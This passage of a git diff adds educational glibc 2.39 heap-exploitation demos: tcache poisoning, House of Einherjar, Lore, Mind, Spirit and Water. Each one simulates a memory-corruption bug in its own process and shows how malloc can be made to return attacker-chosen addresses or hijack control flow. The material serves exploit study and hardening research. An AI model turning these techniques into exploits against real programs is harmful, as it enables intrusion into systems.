in + * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d + * If the libc does not include the restriction, you can simply double free the victim and do a + * simple tcache poisoning + * And thanks to @anton00b and @subwire for the weird name of this technique */ + + // disable buffering so _IO_FILE does not interfere with our heap + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + // introduction + puts("This file demonstrates a powerful tcache poisoning attack by tricking malloc into"); + puts("returning a pointer to an arbitrary location (in this demo, the stack)."); + puts("This attack only relies on double free.\n"); + + // prepare the target + intptr_t stack_var[4]; + puts("The address we want malloc() to return, namely,"); + printf("the target address is %p.\n\n", stack_var); + + // prepare heap layout + puts("Preparing heap layout"); + puts("Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later."); + intptr_t *x[7]; + for(int i=0; i +#include +#include +#include +#include + +int main() +{ + /* + * This modification to The House of Enherjar, made by Huascar Tejeda - @htejeda, works with the tcache-option enabled on glibc-2.32. + * The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc(). + * It has the additional requirement of a heap leak. + * + * After filling the tcache list to bypass the restriction of consolidating with a fake chunk, + * we target the unsorted bin (instead of the small bin) by creating the fake chunk in the heap. + * The following restriction for normal bins won't allow us to create chunks bigger than the memory + * allocated from the system in this arena: + * + * https://sourceware.org/git/?p=glibc.git;a=commit;f=malloc/malloc.c;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c */ + + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + printf("Welcome to House of Einherjar 2!\n"); + printf("Tested on Ubuntu 20.10 64bit (glibc-2.32).\n"); + printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n"); + + printf("This file demonstrates the house of einherjar attack by creating a chunk overlapping situation.\n"); + printf("Next, we use tcache poisoning to hijack control flow.\n" + "Because of https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41," + "now tcache poisoning requires a heap leak.\n"); + + // prepare the target, + // due to https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41, + // it must be properly aligned. + intptr_t stack_var[0x10]; + intptr_t *target = NULL; + + // choose a properly aligned target address + for(int i=0; i<0x10; i++) { + if(((long)&stack_var[i] & 0xf) == 0) { + target = &stack_var[i]; + break; + } + } + assert(target != NULL); + printf("\nThe address we want malloc() to return is %p.\n", (char *)target); + + printf("\nWe allocate 0x38 bytes for 'a' and use it to create a fake chunk\n"); + intptr_t *a = malloc(0x38); + + // create a fake chunk + printf("\nWe create a fake chunk preferably before the chunk(s) we want to overlap, and we must know its address.\n"); + printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n"); + + a[0] = 0; // prev_size (Not Used) + a[1] = 0x60; // size + a[2] = (size_t) a; // fwd + a[3] = (size_t) a; // bck + + printf("Our fake chunk at %p looks like:\n", a); + printf("prev_size (not used): %#lx\n", a[0]); + printf("size: %#lx\n", a[1]); + printf("fwd: %#lx\n", a[2]); + printf("bck: %#lx\n", a[3]); + + printf("\nWe allocate 0x28 bytes for 'b'.\n" + "This chunk will be used to overflow 'b' with a single null byte into the metadata of 'c'\n" + "After this chunk is overlapped, it can be freed and used to launch a tcache poisoning attack.\n"); + uint8_t *b = (uint8_t *) malloc(0x28); + printf("b: %p\n", b); + + int real_b_size = malloc_usable_size(b); + printf("Since we want to overflow 'b', we need the 'real' size of 'b' after rounding: %#x\n", real_b_size); + + /* In this case it is easier if the chunk size attribute has a least significant byte with + * a value of 0x00. The least significant byte of this will be 0x00, because the size of + * the chunk includes the amount requested plus some amount required for the metadata. */ + printf("\nWe allocate 0xf8 bytes for 'c'.\n"); + uint8_t *c = (uint8_t *) malloc(0xf8); + + printf("c: %p\n", c); + + uint64_t* c_size_ptr = (uint64_t*)(c - 8); + // This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit + + printf("\nc.size: %#lx\n", *c_size_ptr); + printf("c.size is: (0x100) | prev_inuse = 0x101\n"); + + printf("We overflow 'b' with a single null byte into the metadata of 'c'\n"); + // VULNERABILITY + b[real_b_size] = 0; + // VULNERABILITY + printf("c.size: %#lx\n", *c_size_ptr); + + printf("It is easier if b.size is a multiple of 0x100 so you " + "don't change the size of b, only its prev_inuse bit\n"); + + // Write a fake prev_size to the end of b + printf("\nWe write a fake prev_size to the last %lu bytes of 'b' so that " + "it will consolidate with our fake chunk\n", sizeof(size_t)); + size_t fake_size = (size_t)((c - sizeof(size_t) * 2) - (uint8_t*) a); + printf("Our fake prev_size will be %p - %p = %#lx\n", c - sizeof(size_t) * 2, a, fake_size); + *(size_t*) &b[real_b_size-sizeof(size_t)] = fake_size; + + // Change the fake chunk's size to reflect c's new prev_size + printf("\nMake sure that our fake chunk's size is equal to c's new prev_size.\n"); + a[1] = fake_size; + + printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", a[1]); + + // Now we fill the tcache before we free chunk 'c' to consolidate with our fake chunk + printf("\nFill tcache.\n"); + intptr_t *x[7]; + for(int i=0; i %p ].\n", b, pad); + + printf("We overwrite b's fwd pointer using chunk 'd'\n"); + // requires a heap leak because it assumes the address of d is known. + // since house of einherjar also requires a heap leak, we can simply just use it here. + d[0x30 / 8] = (long)target ^ ((long)&d[0x30/8] >> 12); + + // take target out + printf("Now we can cash out the target chunk.\n"); + malloc(0x28); + intptr_t *e = malloc(0x28); + printf("\nThe new chunk is at %p\n", e); + + // sanity check + assert(e == target); + printf("Got control on target/stack!\n\n"); +} diff --git a/glibc_2.39/house_of_lore.c b/glibc_2.39/house_of_lore.c new file mode 100644 index 0000000..a1586e0 --- /dev/null +++ b/glibc_2.39/house_of_lore.c @@ -0,0 +1,137 @@ +/* +Advanced exploitation of the House of Lore - Malloc Maleficarum. +This PoC take care also of the glibc hardening of smallbin corruption. + +[ ... ] + +else + { + bck = victim->bk; + if (__glibc_unlikely (bck->fd != victim)){ + + errstr = "malloc(): smallbin double linked list corrupted"; + goto errout; + } + + set_inuse_bit_at_offset (victim, nb); + bin->bk = bck; + bck->fd = bin; + + [ ... ] + +*/ + +#include +#include +#include +#include +#include + +void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); } + +int main(int argc, char * argv[]){ + + + intptr_t* stack_buffer_1[4] = {0}; + intptr_t* stack_buffer_2[4] = {0}; + void* fake_freelist[7][4]; + + fprintf(stderr, "\nWelcome to the House of Lore\n"); + fprintf(stderr, "This is a revisited version that bypass also the hardening check introduced by glibc malloc\n"); + fprintf(stderr, "This is tested against Ubuntu 22.04 - 64bit - glibc-2.35\n\n"); + + fprintf(stderr, "Allocating the victim chunk\n"); + intptr_t *victim = malloc(0x100); + fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim); + + fprintf(stderr, "Allocating dummy chunks for using up tcache later\n"); + void *dummies[7]; + for(int i=0; i<7; i++) dummies[i] = malloc(0x100); + + // victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk + intptr_t *victim_chunk = victim-2; + + fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1); + fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2); + + fprintf(stderr, "Create a fake free-list on the stack\n"); + for(int i=0; i<6; i++) { + fake_freelist[i][3] = fake_freelist[i+1]; + } + fake_freelist[6][3] = NULL; + fprintf(stderr, "fake free-list at %p\n", fake_freelist); + + fprintf(stderr, "Create a fake chunk on the stack\n"); + fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted" + "in second to the last malloc, which putting stack address on smallbin list\n"); + stack_buffer_1[0] = 0; + stack_buffer_1[1] = 0; + stack_buffer_1[2] = victim_chunk; + + fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 " + "in order to bypass the check of small bin corrupted in last malloc, which returning pointer to the fake " + "chunk on stack"); + stack_buffer_1[3] = (intptr_t*)stack_buffer_2; + stack_buffer_2[2] = (intptr_t*)stack_buffer_1; + + fprintf(stderr, "Set the bck pointer of stack_buffer_2 to the fake free-list in order to prevent crash prevent crash " + "introduced by smallbin-to-tcache mechanism\n"); + stack_buffer_2[3] = (intptr_t *)fake_freelist[0]; + + fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with" + "the small one during the free()\n"); + void *p5 = malloc(1000); + fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5); + + + fprintf(stderr, "Freeing dummy chunk\n"); + for(int i=0; i<7; i++) free(dummies[i]); + fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim); + free((void*)victim); + + fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are the unsorted bin's header address (libc addresses)\n"); + fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + fprintf(stderr, "Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n"); + fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim); + + void *p2 = malloc(1200); + fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2); + + fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n"); + fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + //------------VULNERABILITY----------- + + fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); + + victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack + + //------------------------------------ + fprintf(stderr, "Now take all dummies chunk in tcache out\n"); + for(int i=0; i<7; i++) malloc(0x100); + + + fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n"); + fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n"); + + void *p3 = malloc(0x100); + + fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n"); + char *p4 = malloc(0x100); + fprintf(stderr, "p4 = malloc(0x100)\n"); + + fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n", + stack_buffer_2[2]); + + fprintf(stderr, "\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack + intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode + + long offset = (long)__builtin_frame_address(0) - (long)p4; + memcpy((p4+offset+8), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary + + // sanity check + assert((long)__builtin_return_address(0) == (long)jackpot); +} diff --git a/glibc_2.39/house_of_mind_fastbin.c b/glibc_2.39/house_of_mind_fastbin.c new file mode 100644 index 0000000..a8707a3 --- /dev/null +++ b/glibc_2.39/house_of_mind_fastbin.c @@ -0,0 +1,235 @@ +#include +#include +#include +#include +#include +#include + +/* + +House of Mind - Fastbin Variant +========================== + +This attack is similar to the original 'House of Mind' in that it uses +a fake non-main arena in order to write to a new location. This +uses the fastbin for a WRITE-WHERE primitive in the 'fastbin' +variant of the original attack though. The original write for this +can be found at https://dl.packetstormsecurity.net/papers/attack/MallocMaleficarum.txt with a more recent post (by me) at https://maxwelldulin.com/BlogPost?post=2257705984. + +By being able to allocate an arbitrary amount of chunks, a single byte +overwrite on a chunk size and a memory leak, we can control a super +powerful primitive. + +This could be used in order to write a freed pointer to an arbitrary +location (which seems more useful). Or, this could be used as a +write-large-value-WHERE primitive (similar to unsortedbin attack). + Both are interesting in their own right though but the first +option is the most powerful primitive, given the right setting. + +Malloc chunks have a specified size and this size information +special metadata properties (prev_inuse, mmap chunk and non-main arena). +The usage of non-main arenas is the focus of this exploit. For more information +on this, read https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/. + +First, we need to understand HOW the non-main arena is known from a chunk. + +This the 'heap_info' struct: + +struct _heap_info +{ + mstate ar_ptr; // Arena for this heap. <--- Malloc State pointer + struct _heap_info *prev; // Previous heap. + size_t size; // Current size in bytes. + size_t mprotect_size; // Size in bytes that has been mprotected + char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK]; // Proper alignment +} heap_info; +- https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/arena.c#L48 + +The important thing to note is that the 'malloc_state' within +an arena is grabbed from the ar_ptr, which is the FIRST entry +of this. Malloc_state == mstate == arena + +The main arena has a special pointer. However, non-main arenas (mstate) +are at the beginning of a heap section. They are grabbed with the +following code below, where the user controls the 'ptr' in 'arena_for_chunk': + +#define heap_for_ptr(ptr) \ + ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1))) +#define arena_for_chunk(ptr) \ + (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena) +- https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/arena.c#L127 + +This macro takes the 'ptr' and subtracts a large value because the +'heap_info' should be at the beginning of this heap section. Then, +using this, it can find the 'arena' to use. + +The idea behind the attack is to use a fake arena to write pointers +to locations where they should not go but abusing the 'arena_for_chunk' +functionality when freeing a fastbin chunk. + +This POC does the following things: +- Finds a valid arena location for a non-main arena. +- Allocates enough heap chunks to get to the non-main arena location where + we can control the values of the arena data. +- Creates a fake 'heap_info' in order to specify the 'ar_ptr' to be used as the arena later. +- Using this fake arena (ar_ptr), we can use the fastbin to write + to an unexpected location of the 'ar_ptr' with a heap pointer. + +Requirements: +- A heap leak in order to know where the fake 'heap_info' is located at. + - Could be possible to avoid with special spraying techniques +- An unlimited amount of allocations +- A single byte overflow on the size of a chunk + - NEEDS to be possible to put into the fastbin. + - So, either NO tcache or the tcache needs to be filled. +- The location of the malloc state(ar_ptr) needs to have a value larger + than the fastbin size being freed at malloc_state.system_mem otherwise + the chunk will be assumed to be invalid. + - This can be manually inserted or CAREFULLY done by lining up + values in a proper way. +- The NEXT chunk, from the one that is being freed, must be a valid size +(again, greater than 0x20 and less than malloc_state.system_mem) + + +Random perks: +- Can be done MULTIPLE times at the location, with different sized fastbin + chunks. +- Does not brick malloc, unlike the unsorted bin attack. +- Only has three requirements: Infinite allocations, single byte buffer overflowand a heap memory leak. + + + +************************************ +Written up by Maxwell Dulin (Strikeout) +************************************ +*/ + +int main(){ + + printf("House of Mind - Fastbin Variant\n"); + puts("=================================="); + printf("The goal of this technique is to create a fake arena\n"); + printf("at an offset of HEAP_MAX_SIZE\n"); + + printf("Then, we write to the fastbins when the chunk is freed\n"); + printf("This creates a somewhat constrained WRITE-WHERE primitive\n"); + // Values for the allocation information. + int HEAP_MAX_SIZE = 0x4000000; + int MAX_SIZE = (128*1024) - 0x100; // MMap threshold: https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/malloc.c#L635 + + printf("Find initial location of the heap\n"); + // The target location of our attack and the fake arena to use + uint8_t* fake_arena = malloc(0x1000); + uint8_t* target_loc = fake_arena + 0x30; + + uint8_t* target_chunk = (uint8_t*) fake_arena - 0x10; + + /* + Prepare a valid 'malloc_state' (arena) 'system_mem' + to store a fastbin. This is important because the size + of a chunk is validated for being too small or too large + via the 'system_mem' of the 'malloc_state'. This just needs + to be a value larger than our fastbin chunk. + */ + printf("Set 'system_mem' (offset 0x888) for fake arena\n"); + fake_arena[0x888] = 0xFF; + fake_arena[0x889] = 0xFF; + fake_arena[0x88a] = 0xFF; + + printf("Target Memory Address for overwrite: %p\n", target_loc); + printf("Must set data at HEAP_MAX_SIZE (0x%x) offset\n", HEAP_MAX_SIZE); + + // Calculate the location of our fake arena + uint64_t new_arena_value = (((uint64_t) target_chunk) + HEAP_MAX_SIZE) & ~(HEAP_MAX_SIZE - 1); + uint64_t* fake_heap_info = (uint64_t*) new_arena_value; + + uint64_t* user_mem = malloc(MAX_SIZE); + printf("Fake Heap Info struct location: %p\n", fake_heap_info); + printf("Allocate until we reach a MAX_HEAP_SIZE offset\n"); + + /* + The fake arena must be at a particular offset on the heap. + So, we allocate a bunch of chunks until our next chunk + will be in the arena. This value was calculated above. + */ + while((long long)user_mem < new_arena_value){ + user_mem = malloc(MAX_SIZE); + } + + // Use this later to trigger craziness + printf("Create fastbin sized chunk to be victim of attack\n"); + uint64_t* fastbin_chunk = malloc(0x50); // Size of 0x60 + uint64_t* chunk_ptr = fastbin_chunk - 2; // Point to chunk instead of mem + printf("Fastbin Chunk to overwrite: %p\n", fastbin_chunk); + + printf("Fill up the TCache so that the fastbin will be used\n"); + // Fill the tcache to make the fastbin to be used later. + uint64_t* tcache_chunks[7]; + for(int i = 0; i < 7; i++){ + tcache_chunks[i] = malloc(0x50); + } + for(int i = 0; i < 7; i++){ + free(tcache_chunks[i]); + } + + + /* + Create a FAKE malloc_state pointer for the heap_state + This is the 'ar_ptr' of the 'heap_info' struct shown above. + This is the first entry in the 'heap_info' struct at offset 0x0 + at the heap. + + We set this to the location where we want to write a value to. + The location that gets written to depends on the fastbin chunk + size being freed. This will be between an offset of 0x8 and 0x40 + bytes. For instance, a chunk with a size of 0x20 would be in the + 0th index of fastbinsY struct. When this is written to, we will + write to an offset of 8 from the original value written. + - https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/malloc.c#L1686 + */ + printf("Setting 'ar_ptr' (our fake arena) in heap_info struct to %p\n", fake_arena); + fake_heap_info[0] = (uint64_t) fake_arena; // Setting the fake ar_ptr (arena) + printf("Target Write at %p prior to exploitation: 0x%x\n", target_loc, *(target_loc)); + + /* + Set the non-main arena bit on the size. + Additionally, we keep the size the same as the original + allocation because there is a sanity check on the fastbin (when freeing) + that the next chunk has a valid size. + + When grabbing the non-main arena, it will use our choosen arena! + From there, it will write to the fastbin because of the size of the + chunk. + + ///// Vulnerability! Overwriting the chunk size + */ + printf("Set non-main arena bit on the fastbin chunk\n"); + puts("NOTE: This keeps the next chunk size valid because the actual chunk size was never changed\n"); + chunk_ptr[1] = 0x60 | 0x4; // Setting the non-main arena bit + + //// End vulnerability + + /* + The offset being written to with the fastbin chunk address + depends on the fastbin BEING used and the malloc_state itself. + In 2.31, the offset from the beginning of the malloc_state + to the fastbinsY array is 0x10. Then, fastbinsY[0x4] is an + additional byte offset of 0x20. In total, the writing offset + from the arena location is 0x30 bytes. + from the arena location to where the write actually occurs. + This is a similar concept to bk - 0x10 from the unsorted + bin attack. + */ + + printf("When we free the fastbin chunk with the non-main arena bit\n"); + printf("set, it will cause our fake 'heap_info' struct to be used.\n"); + printf("This will dereference our fake arena location and write\n"); + printf("the address of the heap to an offset of the arena pointer.\n"); + + printf("Trigger the magic by freeing the chunk!\n"); + free(fastbin_chunk); // Trigger the madness + + // For this particular fastbin chunk size, the offset is 0x28. + printf("Target Write at %p: 0x%llx\n", target_loc, *((unsigned long long*) (target_loc))); + assert(*((unsigned long *) (target_loc)) != 0); +} diff --git a/glibc_2.39/house_of_spirit.c b/glibc_2.39/house_of_spirit.c new file mode 100644 index 0000000..99c16ef --- /dev/null +++ b/glibc_2.39/house_of_spirit.c @@ -0,0 +1,48 @@ +#include +#include +#include + +int main() +{ + setbuf(stdout, NULL); + + puts("This file demonstrates the house of spirit attack."); + puts("This attack adds a non-heap pointer into fastbin, thus leading to (nearly) arbitrary write."); + puts("Required primitives: known target address, ability to set up the start/end of the target memory"); + + puts("\nStep 1: Allocate 7 chunks and free them to fill up tcache"); + void *chunks[7]; + for(int i=0; i<7; i++) { + chunks[i] = malloc(0x30); + } + for(int i=0; i<7; i++) { + free(chunks[i]); + } + + puts("\nStep 2: Prepare the fake chunk"); + // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY) + long fake_chunks[10] __attribute__ ((aligned (0x10))); + printf("The target fake chunk is at %p\n", fake_chunks); + printf("It contains two chunks. The first starts at %p and the second at %p.\n", &fake_chunks[1], &fake_chunks[9]); + printf("This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n"); + puts("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end."); + printf("Now set the size of the chunk (%p) to 0x40 so malloc will think it is a valid chunk.\n", &fake_chunks[1]); + fake_chunks[1] = 0x40; // this is the size + + printf("The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n"); + printf("Set the size of the chunk (%p) to 0x1234 so freeing the first chunk can succeed.\n", &fake_chunks[9]); + fake_chunks[9] = 0x1234; // nextsize + + puts("\nStep 3: Free the first fake chunk"); + puts("Note that the address of the fake chunk must be 16-byte aligned.\n"); + void *victim = &fake_chunks[2]; + free(victim); + + puts("\nStep 4: Take out the fake chunk"); + printf("Now the next calloc will return our fake chunk at %p!\n", &fake_chunks[2]); + printf("malloc can do the trick as well, you just need to do it for 8 times."); + void *allocated = calloc(1, 0x30); + printf("malloc(0x30): %p, fake chunk: %p\n", allocated, victim); + + assert(allocated == victim); +} diff --git a/glibc_2.39/house_of_water.c b/glibc_2.39/house_of_water.c new file mode 100644 index 0000000..f5dca3a --- /dev/null +++ b/glibc_2.39/house_of_water.c @@ -0,0 +1,370 @@ +#include +#include +#include + +/* + * House of Water is a technique for converting a Use-After-Free (UAF) vulnerability into a t-cache + * metadata control primitive, with the added benefit of obtaining a free libc pointer in the + * t-cache metadata as well. + * + * NOTE: This requires 4 bits of bruteforce if the primitive is a write primitive, as the LSB will + * contain 4 bits of randomness. If you can increment integers, no brutefore is required. + * + * By setting the count of t-cache entries 0x3e0 and 0x3f0 to 1, a "fake" heap chunk header of + * size "0x10001" is created. + * + * This fake heap chunk header happens to be positioned above the 0x20 and 0x30 t-cache linked + * address entries, enabling the creation of a fully functional fake unsorted-bin entry. + * + * The correct size should be set for the chunk, and the next chunk's prev-in-use bit + * must be 0. Therefore, from the fake t-cache metadata chunk+0x10000, the appropriate values + * should be written. + * + * Finally, due to the behavior of allocations from unsorted-bins, once t-cache metadata control + * is achieved, a libc pointer can also be inserted into the metadata. This allows the libc pointer + * to be ready for allocation as well. + * + * Technique / house by @udp_ctf - Water Paddler / Blue Water + */ + +void dump_memory(void *addr, unsigned long count) { + for (unsigned int i = 0; i < count*16; i += 16) { + printf("0x%016lx\t\t0x%016lx 0x%016lx\n", (unsigned long)(addr+i), *(long *)(addr+i), *(long *)(addr+i+0x8)); + } +} + +int main(void) { + // Dummy variable + void *_ = NULL; + + // Prevent _IO_FILE from buffering in the heap + setbuf(stdin, NULL); + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 1 |"); + puts("\t=============================="); + puts("\n"); + + // Step 1: Allocate a 0x3d8 and a 0x3e8 to set their respective t-cache counts to 1, + // effectively inserting 0x10001 in to the t-cache above the 0x20 and 0x30 t-cache + // addresses. + puts("Allocate and free a chunk in 0x3e0 and 0x3f0 t-caches. This sets both"); + puts("their t-cache entry counts to 1 and creates a fake 0x10001 header:"); + + void *fake_size_lsb = malloc(0x3d8); + void *fake_size_msb = malloc(0x3e8); + puts("\t- chunks:"); + printf("\t\t* Entry 0x3e0 @ %p\n", fake_size_lsb); + printf("\t\t* Entry 0x3f0 @ %p\n", fake_size_msb); + free(fake_size_lsb); + free(fake_size_msb); + puts(""); + + // This is just to make a pointer to the t-cache metadata for later. + void *metadata = (void *)((long)(fake_size_lsb) & ~(0xfff)); + + puts("The t-cache metadata will now have the following entry counts:"); + dump_memory(metadata+0x70, 3); + puts(""); + + // Make allocations to free later such that we can exhaust the 0x90 t-cache + puts("Allocate 7 0x88 chunks needed to fill out the 0x90 t-cache at a later time"); + void *x[7]; + for (int i = 0; i < 7; i++) { + x[i] = malloc(0x88); + } + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 2 |"); + puts("\t=============================="); + puts("\n"); + + // Step 2: Create the unsorted bins linked list, used for hijacking at a later time + puts("Now, allocate three 0x90 chunks with guard chunks in between. This prevents"); + puts("chunk-consolidation and sets our target for the house of water attack."); + puts("\t- chunks:"); + + void *unsorted_start = malloc(0x88); + printf("\t\t* unsorted_start\t@ %p\n", unsorted_start); + _ = malloc(0x18); // Guard chunk + + puts("\t\t* /guard/"); + + void *unsorted_middle = malloc(0x88); + printf("\t\t* unsorted_middle\t@ %p\n", unsorted_middle); + _ = malloc(0x18); // Guard chunk + + puts("\t\t* /guard/"); + + void *unsorted_end = malloc(0x88); + printf("\t\t* unsorted_end\t\t@ %p\n", unsorted_end); + _ = malloc(0x18); // Guard chunk + + puts("\t\t* /guard/"); + + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 3 |"); + puts("\t=============================="); + puts("\n"); + + // Step 3: Satisfy the conditions for a free'd chunk, namely having the correct size at the end of the chunk and + // a size field next to it having it's prev-in-use bit set to 0 + puts("Make an allocation to reach the end of the faked chunk"); + + _ = malloc(0xf000); // Padding + void *end_of_fake = malloc(0x18); // Metadata chunk + + puts("\t- chunks:"); + printf("\t\t* padding\t\t@ %p\n", _); + printf("\t\t* end of fake\t\t@ %p\n", end_of_fake); + puts(""); + + puts("Write the correct metadata to the chunk to prevent libc from failing checks:"); + printf("\t*%p = 0x10000\n", end_of_fake); + *(long *)end_of_fake = 0x10000; + printf("\t*%p = 0x20\n", end_of_fake+8); + *(long *)(end_of_fake+0x8) = 0x20; + puts(""); + + puts("Creating the following setup:"); + puts(""); + dump_memory(end_of_fake, 1); + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 4 |"); + puts("\t=============================="); + puts("\n"); + + // Step 4: Free t-cache entries + puts("Fill up the 0x90 t-cache with the chunks allocated from earlier by freeing them."); + puts("By doing so, the next time a 0x88 chunk is free'd, it ends up in the unsorted-bin"); + puts("instead of the t-cache or small-bins."); + for (int i = 0; i < 7; i++) { + free(x[i]); + } + puts("\n"); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 5 |"); + puts("\t=============================="); + puts("\n"); + + // Step 5: Create a 0x20 and a 0x30 t-cache entry which overlaps unsorted_start and unsorted_end. + // By doing this, we can blindly fake a FWD and BCK pointer in the t-cache metadata! + + puts("Here comes the trickiest part!\n"); + + puts("We essentially want a pointer in the 0x20 t-cache metadata to act as a FWD\n" + "pointer and a pointer in the 0x30 t-cache to act as a BCK pointer."); + puts("We want it such that it points to the chunk header of our unsorted bin entries,\n" + "and not at the chunk itself which is common for t-cache.\n"); + + puts("Using a technique like house of botcake or a stronger arb-free primitive, free a"); + puts("chunk such that it overlaps with the header of unsorted_start and unsorte_end."); + puts(""); + + puts("It should look like the following:"); + puts(""); + + puts("unsorted_start:"); + printf("0x%016lx\t\t0x%016lx 0x%016lx <-- tcachebins[0x30][0/1], unsortedbin[all][0]\n", (unsigned long)(unsorted_start-0x10), *(long *)(unsorted_start-0x10), *(long *)(unsorted_start-0x8)); + dump_memory(unsorted_start, 2); + puts(""); + + puts("unsorted_end:"); + printf("0x%016lx\t\t0x%016lx 0x%016lx <-- tcachebins[0x20][0/1], unsortedbin[all][2]\n", (unsigned long)(unsorted_end-0x10), *(long *)(unsorted_end-0x10), *(long *)(unsorted_end-0x8)); + dump_memory(unsorted_end, 2); + + puts("\n"); + puts("If you want to see a blind example using only double free, see the following chal: "); + puts("https://github.com/UDPctf/CTF-challenges/tree/main/Potluck-CTF-2023/Tamagoyaki"); + puts("\n"); + + puts("For the sake of simplicity, let's just simulate an arbitrary free primitive."); + puts("\n"); + + + puts("--------------------"); + puts("| PART 1 |"); + puts("--------------------"); + puts("\n"); + + // Step 5 part 1: + puts("Write 0x31 above unsorted_start to enable its freeing into the 0x30 t-cache."); + printf("\t*%p-0x18 = 0x31\n", unsorted_start); + *(long*)(unsorted_start-0x18) = 0x31; + puts(""); + + puts("This creates a 0x31 entry just above unsorted_start, which looks like the following:"); + dump_memory(unsorted_start-0x20, 3); + puts(""); + + printf("Free the faked 0x31 chunk @ %p\n", unsorted_start-0x10); + free(unsorted_start-0x10); // Create a fake FWD + puts(""); + + puts("Finally, because of the meta-data created by free'ing the 0x31 chunk, we need to"); + puts("restore the original header of the unsorted_start chunk by restoring the 0x91 header:"); + printf("\t*%p-0x8 = 0x91\n", unsorted_start); + *(long*)(unsorted_start-0x8) = 0x91; + puts(""); + + puts("Now, let's do the same for unsorted_end except using a 0x21 faked chunk."); + puts(""); + + + puts("--------------------"); + puts("| PART 2 |"); + puts("--------------------"); + puts("\n"); + + // Step 5 part 2: + puts("Write 0x21 above unsorted_end, such that it can be free'd in to the 0x20 t-cache:"); + printf("\t*%p-0x18 = 0x21\n", unsorted_end); + *(long*)(unsorted_end-0x18) = 0x21; + puts(""); + + puts("This creates a 0x21 just above unsorted_end, which looks like the following:"); + dump_memory(unsorted_end-0x20, 3); + puts(""); + + printf("Free the faked 0x21 chunk @ %p\n", unsorted_end-0x10); + free(unsorted_end-0x10); // Create a fake BCK + puts(""); + + puts("restore the original header of the unsorted_end chunk by restoring the 0x91 header:"); + printf("\t*%p-0x8 = 0x91\n", unsorted_end); + *(long*)(unsorted_end-0x8) = 0x91; + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 6 |"); + puts("\t=============================="); + puts("\n"); + + // Step 6: Create the unsorted bin list + puts("Now, let's free the unsorted bin entries!"); + + puts("\t> free(unsorted_end);"); + free(unsorted_end); + + puts("\t> free(unsorted_middle);"); + free(unsorted_middle); + + puts("\t> free(unsorted_start);"); + free(unsorted_start); + + puts("\n"); + + // Show the setup as is + + puts("At this point, our heap looks something like this:"); + + 